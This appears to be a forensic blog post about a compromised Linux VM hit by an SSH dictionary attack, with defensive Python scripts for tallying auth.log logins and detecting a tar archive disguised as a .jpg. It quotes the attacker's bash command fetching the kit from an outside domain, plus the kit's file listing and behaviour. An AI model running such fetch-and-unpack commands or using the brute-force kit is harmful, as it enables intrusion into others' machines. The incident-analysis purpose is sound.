The first login came from 64.37.51.41; I'm guessing that this computer is one of the infected computers. I got two logins from 90.168.11.25, probably as a test. After that, I got 55 logins from 89.123.236.103, which appears to be the IP address of the command and control server. That IP shows up on a honeypot website as being near a known spammer.
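The login counts above come from reading the sshd entries in the auth log. The script below is an added example (not from the original post) that does the same tally automatically: it parses "Accepted ... from <ip>" lines in the syslog format Debian and Ubuntu write to /var/log/auth.log, counts successful logins per source address, and flags any source that logs in more often than a quiet single-user box should see. The log lines are constructed sample input; the hostname, PIDs and ports are made up, and only the source IPs are taken from the post.

```python
import re
from collections import Counter

# Constructed sample of sshd lines in /var/log/auth.log syslog format.
# Hostname, PIDs and ports are invented; the source IPs are the ones in the post.
SAMPLE_AUTH_LOG = """\
Jan 11 18:55:02 vmhost sshd[2101]: Accepted password for vm from 64.37.51.41 port 41022 ssh2
Jan 11 19:01:10 vmhost sshd[2133]: Accepted password for vm from 90.168.11.25 port 50234 ssh2
Jan 11 19:01:44 vmhost sshd[2140]: Accepted password for vm from 90.168.11.25 port 50240 ssh2
Jan 11 19:08:03 vmhost sshd[2180]: Failed password for root from 89.123.236.103 port 33001 ssh2
Jan 11 19:08:09 vmhost sshd[2182]: Accepted password for vm from 89.123.236.103 port 33002 ssh2
Jan 11 19:09:15 vmhost sshd[2190]: Accepted password for vm from 89.123.236.103 port 33010 ssh2
Jan 11 19:12:40 vmhost sshd[2205]: Accepted password for vm from 89.123.236.103 port 33021 ssh2
Jan 12 14:28:51 vmhost sshd[3310]: Accepted password for vm from 89.123.236.103 port 33400 ssh2
"""

# Matches only successful logins; "Failed password" lines are ignored on purpose.
ACCEPTED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def accepted_logins(log_text):
    """Return (timestamp, user, ip) for every successful sshd login, in log order."""
    hits = []
    for line in log_text.splitlines():
        m = ACCEPTED_RE.match(line)
        if m:
            hits.append((m.group("ts"), m.group("user"), m.group("ip")))
    return hits


def logins_per_ip(log_text):
    """Count successful logins per source address."""
    return Counter(ip for _, _, ip in accepted_logins(log_text))


def first_login(log_text):
    """(timestamp, user, ip) of the earliest successful login, or None."""
    hits = accepted_logins(log_text)
    return hits[0] if hits else None


def suspicious_sources(log_text, threshold=3):
    """Source IPs with at least `threshold` successful logins.

    On a single-user box that normally sees a handful of interactive logins a day,
    a source that logs in this often is the one to check bash history and /var/tmp
    against, as the post did for 89.123.236.103.
    """
    return [ip for ip, n in logins_per_ip(log_text).items() if n >= threshold]


if __name__ == "__main__":
    for ip, n in logins_per_ip(SAMPLE_AUTH_LOG).most_common():
        print(f"{ip:>16}  {n} successful login(s)")
    print("first login:", first_login(SAMPLE_AUTH_LOG))
    print("suspicious:", suspicious_sources(SAMPLE_AUTH_LOG))
```

Run it against a real log with `logins_per_ip(open("/var/log/auth.log").read())`; the threshold is a judgement call for the host, not a fixed number.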
From looking at the bash history, the user downloaded the attack software from skilandat.de. It has a .jpg extension, but it is actually a tar file.
wget skilandat.de/srg/xyz.jpg;tar xvf xyz.jpg;rm -rf xyz.jpg
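The renamed archive is the kind of thing an extension check misses and a content check catches. The following is an added example (not code from the post) that identifies a file by its magic bytes instead of its name: a JPEG starts with FF D8 FF, a POSIX tar carries the string "ustar" at byte 257 of its first header block, and gzip starts with 1F 8B. It also lists the members of a tar without extracting it, which is the safer way to look inside something like xyz.jpg during triage. The tar archive and the JPEG header are constructed in memory as sample input; they are not the files from the post.

```python
import io
import os
import tarfile


def build_sample_tar():
    """Build a small POSIX (ustar) archive in memory as constructed test input."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w", format=tarfile.USTAR_FORMAT) as tf:
        payload = b"#!/bin/sh\necho placeholder\n"
        info = tarfile.TarInfo(name="xyz/placeholder.sh")
        info.size = len(payload)
        tf.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


SAMPLE_TAR = build_sample_tar()
# Constructed JPEG/JFIF header followed by padding; enough for the sniffer, not a real image.
SAMPLE_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 300


def sniff(data):
    """Identify a file by its content, ignoring the filename entirely."""
    if data[:3] == b"\xff\xd8\xff":
        return "jpeg"
    if data[:2] == b"\x1f\x8b":
        return "gzip"
    # ustar and GNU tar both place "ustar" at offset 257 of the first 512-byte header.
    if len(data) >= 262 and data[257:262] == b"ustar":
        return "tar"
    return "unknown"


EXT_TO_TYPE = {".jpg": "jpeg", ".jpeg": "jpeg", ".tar": "tar", ".gz": "gzip", ".tgz": "gzip"}


def extension_mismatch(name, data):
    """True when the extension claims one known type but the bytes identify another."""
    claimed = EXT_TO_TYPE.get(os.path.splitext(name)[1].lower())
    actual = sniff(data)
    return claimed is not None and actual != "unknown" and claimed != actual


def list_members(data):
    """Member names of a tar archive, read from memory without extracting anything."""
    with tarfile.open(fileobj=io.BytesIO(data), mode="r") as tf:
        return tf.getnames()


if __name__ == "__main__":
    for name, data in (("xyz.jpg", SAMPLE_TAR), ("photo.jpg", SAMPLE_JPEG)):
        print(f"{name}: looks like {sniff(data)}, mismatch={extension_mismatch(name, data)}")
    print("members:", list_members(SAMPLE_TAR))
```

On a live system, `sniff(open(path, "rb").read(512))` is enough for the header checks; the same idea is what the `file` utility does with its magic database.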
The xyz attack kit was in /var/tmp/.xyz. It runs a dictionary attack against blocks of IP addresses, and the successful SSH logins from the scan go into trueusers.txt. The copy on my computer currently has 28 ip/user/password combinations. The bash history shows that the attacker used my machine to ssh to a few of the successful hosts.
Here are the contents of the /var/tmp/.xyz folder:
ls -la
total 14188
drwxr-xr-x 2 vm   vm       4096 Jan 12 14:28 .
drwxrwxrwt 7 root root     4096 Jan 14 16:48 ..
-rwxr-xr-x 1 vm   vm        205 Jan 18  2011 a
-rwxr-xr-x 1 vm   vm       3350 Jan 18  2011 mass
-rw-r--r-- 1 vm   vm   11886058 Jan 18  2011 passfile
-rwxr-xr-x 1 vm   vm     167964 Jan 18  2011 pico
-rwxr-xr-x 1 vm   vm       5944 Jan 18  2011 pscan2
-rw-r--r-- 1 vm   vm       5784 Jan 18  2011 pscan2.c
-rwxr-xr-x 1 vm   vm        659 Mar  5  2012 rand
-rw-r--r-- 1 vm   vm          0 Jan 11 19:12 scan.log
-rwxr-xr-x 1 vm   vm     719860 Jan 18  2011 scanner
-rwxr-xr-x 1 vm   vm    1446381 Jan 18  2011 scanssh
-rwxr-xr-x 1 vm   vm     249980 Jan 18  2011 screen
-rw-r--r-- 1 vm   vm        726 Jan 11 19:09 trueusers.txt
-rwxr-xr-x 1 vm   vm        205 Jan 18  2011 x